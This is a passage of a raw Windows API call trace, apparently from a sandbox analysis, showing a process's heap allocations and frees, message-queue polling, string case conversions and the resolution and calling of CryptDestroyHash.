[0188.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.320] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.320] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.320] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.320] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.320] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.322] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.322] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.325] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.329] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.329] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.329] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.329] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 